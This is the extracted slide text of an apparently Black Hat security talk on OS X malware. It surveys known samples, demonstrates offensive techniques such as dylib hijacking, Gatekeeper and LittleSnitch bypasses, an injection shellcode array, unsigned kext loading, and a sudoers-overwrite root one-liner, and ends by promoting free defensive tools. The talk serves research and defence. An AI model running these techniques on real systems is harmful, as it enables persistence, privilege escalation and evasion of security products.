 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
  • 8. ‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
  • 9. an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
  • 10. hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
  • 11. the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
  • 12. BAD @$$ OS X MALWARE current malware++
  • 13. current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
  • 14. a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
  • 15. these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
  • 16. current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
  • 17. fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
  • 18. the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
  • 19. self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
  • 20. simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
  • 21. via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
  • 22. currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
  • 23. abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
  • 24. tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
  • 25. IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
  • 26. dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
  • 27. unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
  • 28. other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
  • 29. getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
  • 30. determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
  • 31. //remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
  • 32. getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
  • 33. dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
  • 34. into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
  • 35. ...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
  • 36. allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
  • 37. all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
  • 38. go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
  • 39. #winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
  • 40. avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
  • 41. apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
  • 42. decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
  • 43. allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
  • 44. directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
  • 45. rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
  • 46. ...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
  • 47. abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
  • 48. load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
  • 49. more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
  • 50. putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
  • 51. ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
  • 52. DEFENSE free os x security tools
  • 53. MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 54. free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
  • 55. KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
  • 56. KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
  • 57. BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
  • 58. TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
  • 59. EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
  • 61. CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
  • 62. QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
  • 63. credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books